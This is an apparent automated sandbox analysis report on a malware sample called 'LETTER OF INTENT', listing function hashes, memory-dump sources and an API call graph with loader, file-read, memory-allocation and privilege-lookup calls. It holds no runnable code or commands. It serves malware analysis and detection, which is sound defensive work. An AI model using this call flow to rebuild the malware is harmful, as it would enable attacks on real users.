              • Opcode Fuzzy Hash: ed54cd1ffa11d4fe66b2c6e11964c44ce59e0d4041d517517d209f64c04f522b
              • Instruction Fuzzy Hash: 9BE092B0D40619EFD750EFA9C905A5EBBF4AB08214F11C9A9D019E7215E7B496048F91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192A898 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d95796befed82945393c9bda4063d719ccd3466613669fcc2f0242d21e8324e3
              • Instruction ID: 30ce9cb670704956c72f9df06f3cf9604c316bfb7b8332193f07d2fdd3807ede
              • Opcode Fuzzy Hash: d95796befed82945393c9bda4063d719ccd3466613669fcc2f0242d21e8324e3
              • Instruction Fuzzy Hash: 06C08C3209F6648BC11012D4600ABB47E9C9B4A216F101810E22E4380BAEA05482CA27
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192A868 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4292c5143f6e28f55103abda68f10ca5b955a4588953cb8170dac0488064c1a
              • Instruction ID: e4daf3876f60623c8d34ce04ccc052367c7138fd3c5ff65a875f3d8f25b67bfd
              • Opcode Fuzzy Hash: f4292c5143f6e28f55103abda68f10ca5b955a4588953cb8170dac0488064c1a
              • Instruction Fuzzy Hash: 87C08C3A0AF2288AD1049299A80ABB47EDC9B0E346F001810E61E03819AEA0DC42C923
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192B4E8 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0704f032564368cd1a00e5a6c37e99f7c2a98d216766fc45cba16ab7b4b9fb75
              • Instruction ID: 543809ae8d8ffcb041bd86476711de8701f8eb00ed81f23407654c509bac02c3
              • Opcode Fuzzy Hash: 0704f032564368cd1a00e5a6c37e99f7c2a98d216766fc45cba16ab7b4b9fb75
              • Instruction Fuzzy Hash: DDC02B1009721C4DC000219B24C8BB83FCC4701704F401C10C72D034D58E508080CC00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01922613 Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f70895563a01d64c66bca21f87ffb4b3e4207bf4ddea6ee6eae99dbf9aa8513e
              • Instruction ID: 833e0466fda4e9fe7a2b079437c3400001706d03017963561a841ca81bbb1621
              • Opcode Fuzzy Hash: f70895563a01d64c66bca21f87ffb4b3e4207bf4ddea6ee6eae99dbf9aa8513e
              • Instruction Fuzzy Hash: 42B0923A000102AF8741EB40C900C89BAE1BBA9300745C156E2488A130C622C528AB52
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 061C0040 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID: A
              • API String ID: 0-3554254475
              • Opcode ID: 09f8c8022ef4bd65128cdef8049bbf32734638390b56d1781fa1b5784b9cd018
              • Instruction ID: 0410d0c886b5216e8fb22904dd4aa66663b2278d4798694e4d06596f19509c04
              • Opcode Fuzzy Hash: 09f8c8022ef4bd65128cdef8049bbf32734638390b56d1781fa1b5784b9cd018
              • Instruction Fuzzy Hash: 0C4131B1E016588BEB5DCF6BDD4068EFAF7AFC8200F14C5BA950DBA254DB7006828F10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192622A Relevance: .3, Instructions: 278COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 090f2f8236dfb229833935f16b5c538c41b324205fd007564fe85469e54eae2d
              • Instruction ID: 60c2967bc16651e5864bc9ea58588f61148b37024f3c8b17d908ebe9d6aa5844
              • Opcode Fuzzy Hash: 090f2f8236dfb229833935f16b5c538c41b324205fd007564fe85469e54eae2d
              • Instruction Fuzzy Hash: 37E12930C2175A9ACB10EB64D8506ADB7B5FF99300F518B9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192624F Relevance: .3, Instructions: 269COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3df78b5598c97d3834f5b7e3f08e39322e0dd18690d62a1c00cb6e368d5d6afd
              • Instruction ID: 7855ac2abb7024c1436e079da15f76bc23eff82b9b147decbb5d911cf509c881
              • Opcode Fuzzy Hash: 3df78b5598c97d3834f5b7e3f08e39322e0dd18690d62a1c00cb6e368d5d6afd
              • Instruction Fuzzy Hash: A5D10930C2175A9ACB10EB64D8506ADB7B5FF99300F519B9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926260 Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9ab184f3b8757bcabe4aff5ec83b9a90a5ca2183de0bbd9341299a6ef9ae873
              • Instruction ID: e31fdbe844f1bf2c8701327bb67f3923237b5cf8e76dc6232b9c0dd640185083
              • Opcode Fuzzy Hash: c9ab184f3b8757bcabe4aff5ec83b9a90a5ca2183de0bbd9341299a6ef9ae873
              • Instruction Fuzzy Hash: 24D1F930C2175A9ACB10EB64D850A9DB7B5FF99300F51DB9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192B1C0 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c0727e4cd282ab00c24153fe6cf84b773db38ecac1d29db6d90a253cd5593c3
              • Instruction ID: 55096190c5045ea205cfbb0b87f47a8f523dd7d9d8afff19b75eca4b275c7856
              • Opcode Fuzzy Hash: 1c0727e4cd282ab00c24153fe6cf84b773db38ecac1d29db6d90a253cd5593c3
              • Instruction Fuzzy Hash: 16510B70E11215DFDB44DFAAE881A9DBFB6FB88304F04CD29D1059B264DF745906CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C0006 Relevance: .1, Instructions: 121COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74a7193e4c937ecc253c1aa90219c00585370db7b58312226f76fe64aa419e2c
              • Instruction ID: f7b1e92ccea6c2199b63df5fdf79452537204fc4ab7b5fb3350c6d1026513e50
              • Opcode Fuzzy Hash: 74a7193e4c937ecc253c1aa90219c00585370db7b58312226f76fe64aa419e2c
              • Instruction Fuzzy Hash: 02418EB1D057548FE75DCF678D5028EFAF3AFC9210F19C0BAD448AA265EB340A868F11
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:8.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.1%
              Total number of Nodes:678
              Total number of Limit Nodes:76
              execution_graph 15154 41d3c0 15157 419be0 15154->15157 15158 419c06 15157->15158 15169 408b50 15158->15169 15160 419c12 15161 419c59 15160->15161 15177 40d160 15160->15177 15163 419c27 15164 419c3c 15163->15164 15225 418920 15163->15225 15189 40a600 15164->15189 15167 419c4b 15168 418920 2 API calls 15167->15168 15168->15161 15170 408b5d 15169->15170 15228 408aa0 15169->15228 15172 408b64 15170->15172 15240 408a40 15170->15240 15172->15160 15178 40d18c 15177->15178 15736 40a000 15178->15736 15180 40d19e 15740 40d070 15180->15740 15183 40d1d1 15186 40d1e2 15183->15186 15188 418700 2 API calls 15183->15188 15184 40d1b9 15185 40d1c4 15184->15185 15187 418700 2 API calls 15184->15187 15185->15163 15186->15163 15187->15185 15188->15186 15190 40a625 15189->15190 15191 40a000 LdrLoadDll 15190->15191 15192 40a67c 15191->15192 15756 409c80 15192->15756 15194 40a6a2 15224 40a8f3 15194->15224 15765 413390 15194->15765 15196 40a6e7 15196->15224 15768 4079d0 15196->15768 15198 40a72b 15198->15224 15775 418770 15198->15775 15202 40a781 15203 40a788 15202->15203 15204 418280 LdrLoadDll 15202->15204 15205 41a090 2 API calls 15203->15205 15206 40a7c5 15204->15206 15207 40a795 15205->15207 15208 40a7d2 15206->15208 15211 40a7e2 15206->15211 15207->15167 15209 41a090 2 API calls 15208->15209 15210 40a7d9 15209->15210 15210->15167 15212 40d1f0 LdrLoadDll 15211->15212 15213 40a856 15212->15213 15213->15203 15214 40a861 15213->15214 15215 41a090 2 API calls 15214->15215 15216 40a885 15215->15216 15785 4182d0 15216->15785 15219 418280 LdrLoadDll 15220 40a8c0 15219->15220 15220->15224 15788 418090 15220->15788 15223 418920 2 API calls 15223->15224 15224->15167 15226 4191d0 LdrLoadDll 15225->15226 15227 41893f ExitProcess 15226->15227 15227->15164 15229 408ab3 15228->15229 15279 416e40 15228->15279 15259 416cf0 15229->15259 15232 408ac6 15232->15170 15233 408abc 15233->15232 15262 419520 15233->15262 15235 408b03 15235->15232 15273 4088c0 15235->15273 15237 408b23 15283 408320 15237->15283 15239 408b35 15239->15170 15718 419810 15240->15718 15243 419810 LdrLoadDll 15244 408a6b 15243->15244 15245 419810 LdrLoadDll 15244->15245 15246 408a81 15245->15246 15247 40cf60 15246->15247 15248 40cf79 15247->15248 15722 409e80 15248->15722 15250 40cf8c 15726 418450 15250->15726 15254 40cfb2 15258 40cfdd 15254->15258 15733 4184d0 15254->15733 15256 418700 2 API calls 15257 408b75 15256->15257 15257->15160 15258->15256 15287 418870 15259->15287 15263 419539 15262->15263 15327 413a40 15263->15327 15265 419551 15266 41955a 15265->15266 15366 419360 15265->15366 15266->15235 15268 41956e 15268->15266 15384 418170 15268->15384 15692 406e20 15273->15692 15275 4088e1 15275->15237 15276 4088da 15276->15275 15705 4070e0 15276->15705 15280 416e4f 15279->15280 15281 413e40 LdrLoadDll 15280->15281 15282 416e8d 15281->15282 15282->15229 15284 408348 15283->15284 15711 409d50 15284->15711 15286 40837e 15286->15239 15288 416d05 15287->15288 15290 4191d0 15287->15290 15288->15233 15291 4191e0 15290->15291 15293 419202 15290->15293 15294 413e40 15291->15294 15293->15288 15295 413e5a 15294->15295 15296 413e4e 15294->15296 15295->15293 15296->15295 15299 4142c0 15296->15299 15304 413fc0 15299->15304 15301 4142d8 15302 413e40 LdrLoadDll 15301->15302 15303 413fac 15301->15303 15302->15303 15303->15293 15305 413fe5 15304->15305 15306 414054 15305->15306 15318 409b30 15305->15318 15306->15301 15308 414086 15314 41412b 15308->15314 15323 41a330 15308->15323 15311 414124 15311->15314 15316 4142c0 LdrLoadDll 15311->15316 15312 414191 15313 4142c0 LdrLoadDll 15312->15313 15312->15314 15315 4141c3 15313->15315 15314->15301 15315->15301 15317 414187 15316->15317 15317->15301 15320 409b54 15318->15320 15319 409b5b 15319->15308 15320->15319 15321 409b90 LdrLoadDll 15320->15321 15322 409ba7 15320->15322 15321->15322 15322->15308 15325 41a333 15323->15325 15324 4140cd 15324->15311 15324->15312 15324->15314 15325->15324 15326 413e40 LdrLoadDll 15325->15326 15326->15324 15328 413d75 15327->15328 15329 413a54 15327->15329 15328->15265 15329->15328 15390 417ec0 15329->15390 15332 413b80 15393 4185d0 15332->15393 15333 413b63 15450 4186d0 15333->15450 15336 413b6d 15336->15265 15337 413ba7 15338 41a090 2 API calls 15337->15338 15340 413bb3 15338->15340 15339 413d39 15342 418700 2 API calls 15339->15342 15340->15336 15340->15339 15341 413d4f 15340->15341 15346 413c42 15340->15346 15475 413780 15341->15475 15343 413d40 15342->15343 15343->15265 15345 413d62 15345->15265 15347 413ca9 15346->15347 15349 413c51 15346->15349 15347->15339 15348 413cbc 15347->15348 15466 418550 15348->15466 15351 413c56 15349->15351 15352 413c6a 15349->15352 15453 413640 15351->15453 15355 413c87 15352->15355 15356 413c6f 15352->15356 15355->15343 15408 413400 15355->15408 15396 4136e0 15356->15396 15358 413c60 15358->15265 15361 413c7d 15361->15265 15364 413c9f 15364->15265 15365 413d28 15365->15265 15368 419371 15366->15368 15367 419383 15367->15268 15368->15367 15539 41a010 15368->15539 15370 4193a4 15542 413050 15370->15542 15372 4193f0 15372->15268 15373 4193c7 15373->15372 15374 413050 3 API calls 15373->15374 15376 4193e9 15374->15376 15376->15372 15567 414380 15376->15567 15377 41947a 15378 41948a 15377->15378 15659 419170 15377->15659 15577 418fe0 15378->15577 15381 4194b8 15656 418130 15381->15656 15383 4194e2 15383->15268 15383->15383 15385 41818c 15384->15385 15386 4191d0 LdrLoadDll 15384->15386 15387 41a090 15385->15387 15386->15385 15388 4195c9 15387->15388 15689 4188e0 15387->15689 15388->15235 15391 4191d0 LdrLoadDll 15390->15391 15392 413b34 15391->15392 15392->15332 15392->15333 15392->15336 15394 4185ec NtCreateFile 15393->15394 15395 4191d0 LdrLoadDll 15393->15395 15394->15337 15395->15394 15397 4136fc 15396->15397 15398 418550 LdrLoadDll 15397->15398 15399 41371d 15398->15399 15400 413724 15399->15400 15401 413738 15399->15401 15402 418700 2 API calls 15400->15402 15403 418700 2 API calls 15401->15403 15404 41372d 15402->15404 15405 413741 15403->15405 15404->15361 15510 41a2a0 15405->15510 15407 41374c 15407->15361 15409 41344b 15408->15409 15410 41347e 15408->15410 15412 418550 LdrLoadDll 15409->15412 15411 4135c9 15410->15411 15416 41349a 15410->15416 15413 418550 LdrLoadDll 15411->15413 15414 413466 15412->15414 15420 4135e4 15413->15420 15415 418700 2 API calls 15414->15415 15417 41346f 15415->15417 15418 418550 LdrLoadDll 15416->15418 15417->15364 15419 4134b5 15418->15419 15422 4134d1 15419->15422 15423 4134bc 15419->15423 15421 418590 LdrLoadDll 15420->15421 15424 41361e 15421->15424 15426 4134d6 15422->15426 15427 4134ec 15422->15427 15425 418700 2 API calls 15423->15425 15429 418700 2 API calls 15424->15429 15430 4134c5 15425->15430 15431 418700 2 API calls 15426->15431 15428 4134f1 15427->15428 15516 41a260 15427->15516 15432 413503 15428->15432 15519 418680 15428->15519 15433 413629 15429->15433 15430->15364 15434 4134df 15431->15434 15432->15364 15433->15364 15434->15364 15437 413557 15438 41356e 15437->15438 15527 418510 15437->15527 15439 413575 15438->15439 15440 41358a 15438->15440 15442 418700 2 API calls 15439->15442 15443 418700 2 API calls 15440->15443 15442->15432 15444 413593 15443->15444 15445 4135bf 15444->15445 15522 419e60 15444->15522 15445->15364 15447 4135aa 15448 41a090 2 API calls 15447->15448 15449 4135b3 15448->15449 15449->15364 15451 4186ec 15450->15451 15452 4191d0 LdrLoadDll 15450->15452 15451->15336 15452->15451 15530 418230 15453->15530 15456 413684 15458 418700 2 API calls 15456->15458 15457 413698 15533 418280 15457->15533 15460 41368d 15458->15460 15460->15358 15462 418700 2 API calls 15463 4136c2 15462->15463 15464 418700 2 API calls 15463->15464 15465 4136cc 15464->15465 15465->15358 15467 4191d0 LdrLoadDll 15466->15467 15468 413d04 15467->15468 15469 418590 15468->15469 15470 413d1c 15469->15470 15471 4191d0 LdrLoadDll 15469->15471 15472 418700 15470->15472 15471->15470 15473 4191d0 LdrLoadDll 15472->15473 15474 41871c NtClose 15473->15474 15474->15365 15476 413796 15475->15476 15477 418550 LdrLoadDll 15476->15477 15478 4137be 15477->15478 15479 4137c7 15478->15479 15480 4137dc 15478->15480 15481 418700 2 API calls 15479->15481 15483 413800 15480->15483 15484 41384a 15480->15484 15482 4137d0 15481->15482 15482->15345 15536 418630 15483->15536 15485 413890 15484->15485 15486 41384f 15484->15486 15488 4139ca 15485->15488 15491 4138a2 15485->15491 15486->15482 15490 418680 2 API calls 15486->15490 15488->15482 15500 418680 2 API calls 15488->15500 15493 41387a 15490->15493 15494 4138a7 15491->15494 15498 4138e2 15491->15498 15492 418700 2 API calls 15492->15482 15495 418700 2 API calls 15493->15495 15496 418630 LdrLoadDll 15494->15496 15497 413883 15495->15497 15499 4138ca 15496->15499 15497->15345 15498->15482 15502 418630 LdrLoadDll 15498->15502 15501 418700 2 API calls 15499->15501 15503 413a21 15500->15503 15504 4138d3 15501->15504 15505 41390a 15502->15505 15506 418700 2 API calls 15503->15506 15504->15345 15507 418700 2 API calls 15505->15507 15508 413a2a 15506->15508 15509 413915 15507->15509 15508->15345 15509->15345 15511 41a2ba 15510->15511 15513 4188a0 15510->15513 15511->15407 15514 4188bc RtlAllocateHeap 15513->15514 15515 4191d0 LdrLoadDll 15513->15515 15514->15511 15515->15514 15517 4188a0 2 API calls 15516->15517 15518 41a278 15516->15518 15517->15518 15518->15428 15520 41869c NtReadFile 15519->15520 15521 4191d0 LdrLoadDll 15519->15521 15520->15437 15521->15520 15523 419e84 15522->15523 15524 419e6d 15522->15524 15523->15447 15524->15523 15525 41a260 2 API calls 15524->15525 15526 419e9b 15525->15526 15526->15447 15528 4191d0 LdrLoadDll 15527->15528 15529 41852c 15528->15529 15529->15438 15531 41367d 15530->15531 15532 4191d0 LdrLoadDll 15530->15532 15531->15456 15531->15457 15532->15531 15534 4191d0 LdrLoadDll 15533->15534 15535 4136b9 15534->15535 15535->15462 15537 413825 15536->15537 15538 4191d0 LdrLoadDll 15536->15538 15537->15492 15538->15537 15540 41a03d 15539->15540 15663 4187b0 15539->15663 15540->15370 15543 413061 15542->15543 15545 413069 15542->15545 15543->15373 15544 41333c 15544->15373 15545->15544 15666 41b240 15545->15666 15547 4130bd 15548 41b240 2 API calls 15547->15548 15552 4130c8 15548->15552 15549 413116 15551 41b240 2 API calls 15549->15551 15554 41312a 15551->15554 15552->15549 15671 41b2e0 15552->15671 15553 41b240 2 API calls 15556 41319d 15553->15556 15554->15553 15555 41b240 2 API calls 15564 4131e5 15555->15564 15556->15555 15559 41b2a0 2 API calls 15560 41331e 15559->15560 15561 41b2a0 2 API calls 15560->15561 15562 413328 15561->15562 15563 41b2a0 2 API calls 15562->15563 15565 413332 15563->15565 15677 41b2a0 15564->15677 15566 41b2a0 2 API calls 15565->15566 15566->15544 15568 414391 15567->15568 15569 413a40 6 API calls 15568->15569 15571 4143a7 15569->15571 15570 4143fa 15570->15377 15571->15570 15572 4143e2 15571->15572 15573 4143f5 15571->15573 15575 41a090 2 API calls 15572->15575 15574 41a090 2 API calls 15573->15574 15574->15570 15576 4143e7 15575->15576 15576->15377 15680 418ea0 15577->15680 15580 418ea0 LdrLoadDll 15581 418ffd 15580->15581 15582 418ea0 LdrLoadDll 15581->15582 15583 419006 15582->15583 15584 418ea0 LdrLoadDll 15583->15584 15585 41900f 15584->15585 15586 418ea0 LdrLoadDll 15585->15586 15587 419018 15586->15587 15588 418ea0 LdrLoadDll 15587->15588 15589 419021 15588->15589 15590 418ea0 LdrLoadDll 15589->15590 15591 41902d 15590->15591 15592 418ea0 LdrLoadDll 15591->15592 15593 419036 15592->15593 15594 418ea0 LdrLoadDll 15593->15594 15595 41903f 15594->15595 15596 418ea0 LdrLoadDll 15595->15596 15597 419048 15596->15597 15598 418ea0 LdrLoadDll 15597->15598 15599 419051 15598->15599 15600 418ea0 LdrLoadDll 15599->15600 15601 41905a 15600->15601 15602 418ea0 LdrLoadDll 15601->15602 15603 419066 15602->15603 15604 418ea0 LdrLoadDll 15603->15604 15605 41906f 15604->15605 15606 418ea0 LdrLoadDll 15605->15606 15607 419078 15606->15607 15608 418ea0 LdrLoadDll 15607->15608 15609 419081 15608->15609 15610 418ea0 LdrLoadDll 15609->15610 15611 41908a 15610->15611 15612 418ea0 LdrLoadDll 15611->15612 15613 419093 15612->15613 15614 418ea0 LdrLoadDll 15613->15614 15615 41909f 15614->15615 15616 418ea0 LdrLoadDll 15615->15616 15617 4190a8 15616->15617 15618 418ea0 LdrLoadDll 15617->15618 15619 4190b1 15618->15619 15620 418ea0 LdrLoadDll 15619->15620 15621 4190ba 15620->15621 15622 418ea0 LdrLoadDll 15621->15622 15623 4190c3 15622->15623 15624 418ea0 LdrLoadDll 15623->15624 15625 4190cc 15624->15625 15626 418ea0 LdrLoadDll 15625->15626 15627 4190d8 15626->15627 15628 418ea0 LdrLoadDll 15627->15628 15629 4190e1 15628->15629 15630 418ea0 LdrLoadDll 15629->15630 15631 4190ea 15630->15631 15632 418ea0 LdrLoadDll 15631->15632 15633 4190f3 15632->15633 15634 418ea0 LdrLoadDll 15633->15634 15635 4190fc 15634->15635 15636 418ea0 LdrLoadDll 15635->15636 15637 419105 15636->15637 15638 418ea0 LdrLoadDll 15637->15638 15639 419111 15638->15639 15640 418ea0 LdrLoadDll 15639->15640 15641 41911a 15640->15641 15642 418ea0 LdrLoadDll 15641->15642 15643 419123 15642->15643 15644 418ea0 LdrLoadDll 15643->15644 15645 41912c 15644->15645 15646 418ea0 LdrLoadDll 15645->15646 15647 419135 15646->15647 15648 418ea0 LdrLoadDll 15647->15648 15649 41913e 15648->15649 15650 418ea0 LdrLoadDll 15649->15650 15651 41914a 15650->15651 15652 418ea0 LdrLoadDll 15651->15652 15653 419153 15652->15653 15654 418ea0 LdrLoadDll 15653->15654 15655 41915c 15654->15655 15655->15381 15657 4191d0 LdrLoadDll 15656->15657 15658 41814c 15657->15658 15658->15383 15660 419183 15659->15660 15686 418730 15660->15686 15664 4187cc NtAllocateVirtualMemory 15663->15664 15665 4191d0 LdrLoadDll 15663->15665 15664->15540 15665->15664 15667 41b250 15666->15667 15668 41b256 15666->15668 15667->15547 15669 41a260 2 API calls 15668->15669 15670 41b27c 15669->15670 15670->15547 15672 41b305 15671->15672 15675 41b33d 15671->15675 15673 41a260 2 API calls 15672->15673 15674 41b31a 15673->15674 15676 41a090 2 API calls 15674->15676 15675->15552 15676->15675 15678 413314 15677->15678 15679 41a090 2 API calls 15677->15679 15678->15559 15679->15678 15681 418ebb 15680->15681 15682 413e40 LdrLoadDll 15681->15682 15683 418edb 15682->15683 15684 413e40 LdrLoadDll 15683->15684 15685 418f87 15683->15685 15684->15685 15685->15580 15687 41874c 15686->15687 15688 4191d0 LdrLoadDll 15686->15688 15687->15378 15688->15687 15690 4188fc RtlFreeHeap 15689->15690 15691 4191d0 LdrLoadDll 15689->15691 15690->15388 15691->15690 15693 406e30 15692->15693 15694 406e2b 15692->15694 15695 41a010 2 API calls 15693->15695 15694->15276 15698 406e55 15695->15698 15696 406eb8 15696->15276 15697 418130 LdrLoadDll 15697->15698 15698->15696 15698->15697 15699 406ebe 15698->15699 15703 41a010 2 API calls 15698->15703 15708 418830 15698->15708 15701 406ee4 15699->15701 15702 418830 LdrLoadDll 15699->15702 15701->15276 15704 406ed5 15702->15704 15703->15698 15704->15276 15706 4070fe 15705->15706 15707 418830 LdrLoadDll 15705->15707 15706->15237 15707->15706 15709 4191d0 LdrLoadDll 15708->15709 15710 41884c 15709->15710 15710->15698 15712 409d74 15711->15712 15715 417f00 15712->15715 15714 409dae 15714->15286 15716 417f1c 15715->15716 15717 4191d0 LdrLoadDll 15715->15717 15716->15714 15717->15716 15719 419833 15718->15719 15720 409b30 LdrLoadDll 15719->15720 15721 408a5a 15720->15721 15721->15243 15723 409ea3 15722->15723 15724 409f20 15723->15724 15725 417f00 LdrLoadDll 15723->15725 15724->15250 15725->15724 15727 4191d0 LdrLoadDll 15726->15727 15728 40cf9b 15727->15728 15728->15257 15729 418a40 15728->15729 15730 418a4c 15729->15730 15731 4191d0 LdrLoadDll 15730->15731 15732 418a5f LookupPrivilegeValueW 15731->15732 15732->15254 15734 4191d0 LdrLoadDll 15733->15734 15735 4184ec 15734->15735 15735->15258 15737 40a027 15736->15737 15738 409e80 LdrLoadDll 15737->15738 15739 40a056 15738->15739 15739->15180 15741 40d08a 15740->15741 15749 40d140 15740->15749 15742 409e80 LdrLoadDll 15741->15742 15743 40d0ac 15742->15743 15750 4181b0 15743->15750 15745 40d0ee 15753 4181f0 15745->15753 15748 418700 2 API calls 15748->15749 15749->15183 15749->15184 15751 4181cc 15750->15751 15752 4191d0 LdrLoadDll 15750->15752 15751->15745 15752->15751 15754 40d134 15753->15754 15755 4191d0 LdrLoadDll 15753->15755 15754->15748 15755->15754 15757 409c91 15756->15757 15758 409c8d 15756->15758 15759 409caa 15757->15759 15760 409cdc 15757->15760 15758->15194 15791 417f40 15759->15791 15761 417f40 LdrLoadDll 15760->15761 15762 409ced 15761->15762 15762->15194 15766 40d1f0 LdrLoadDll 15765->15766 15767 4133b6 15765->15767 15766->15767 15767->15196 15794 407710 15768->15794 15771 407710 8 API calls 15772 4079fa 15771->15772 15774 407a0d 15772->15774 15812 40d460 15772->15812 15774->15198 15776 4191d0 LdrLoadDll 15775->15776 15777 40a762 15776->15777 15778 40d1f0 15777->15778 15779 40d20d 15778->15779 15780 418230 LdrLoadDll 15779->15780 15781 40d24e 15780->15781 15782 40d255 15781->15782 15783 418280 LdrLoadDll 15781->15783 15782->15202 15784 40d27e 15783->15784 15784->15202 15786 4191d0 LdrLoadDll 15785->15786 15787 40a899 15786->15787 15787->15219 15789 4191d0 LdrLoadDll 15788->15789 15790 40a8ec 15789->15790 15790->15223 15792 4191d0 LdrLoadDll 15791->15792 15793 409ccc 15792->15793 15793->15194 15795 406e20 2 API calls 15794->15795 15798 40772a 15794->15798 15795->15798 15796 4079b9 15796->15771 15796->15774 15797 4079af 15799 4070e0 LdrLoadDll 15797->15799 15798->15796 15798->15797 15802 418170 LdrLoadDll 15798->15802 15806 40a900 LdrLoadDll NtClose 15798->15806 15809 418090 LdrLoadDll 15798->15809 15810 418700 LdrLoadDll NtClose 15798->15810 15820 417f80 15798->15820 15823 407540 15798->15823 15835 40d340 15798->15835 15843 418000 15798->15843 15846 418030 15798->15846 15849 4180c0 15798->15849 15852 407310 15798->15852 15868 405ea0 15798->15868 15799->15796 15802->15798 15806->15798 15809->15798 15810->15798 15813 40d485 15812->15813 15814 407120 6 API calls 15813->15814 15816 40d4a9 15814->15816 15815 40d4b6 15815->15774 15816->15815 15817 413a40 6 API calls 15816->15817 15819 41a090 2 API calls 15816->15819 15956 40d2a0 15816->15956 15817->15816 15819->15816 15821 417f9c 15820->15821 15822 4191d0 LdrLoadDll 15820->15822 15821->15798 15822->15821 15824 407556 15823->15824 15878 417af0 15824->15878 15826 40756f 15831 4076e1 15826->15831 15899 407120 15826->15899 15828 407655 15829 407310 7 API calls 15828->15829 15828->15831 15830 407683 15829->15830 15830->15831 15832 418170 LdrLoadDll 15830->15832 15831->15798 15833 4076b8 15832->15833 15833->15831 15834 418770 LdrLoadDll 15833->15834 15834->15831 15935 417fc0 15835->15935 15839 40d3b1 15839->15798 15841 418700 2 API calls 15842 40d3a5 15841->15842 15842->15798 15844 4191d0 LdrLoadDll 15843->15844 15845 41801c 15844->15845 15845->15798 15847 4191d0 LdrLoadDll 15846->15847 15848 41804c 15847->15848 15848->15798 15850 4191d0 LdrLoadDll 15849->15850 15851 4180dc 15850->15851 15851->15798 15853 407339 15852->15853 15941 407280 15853->15941 15855 40734c 15857 418770 LdrLoadDll 15855->15857 15858 4073d7 15855->15858 15861 4073d2 15855->15861 15949 40d3c0 15855->15949 15857->15855 15858->15798 15859 418700 2 API calls 15860 40740a 15859->15860 15860->15858 15862 417f80 LdrLoadDll 15860->15862 15861->15859 15863 40746f 15862->15863 15863->15858 15864 417fc0 LdrLoadDll 15863->15864 15865 4074d3 15864->15865 15865->15858 15866 413a40 6 API calls 15865->15866 15867 407528 15866->15867 15867->15798 15869 405eea 15868->15869 15870 417f80 LdrLoadDll 15869->15870 15871 405f04 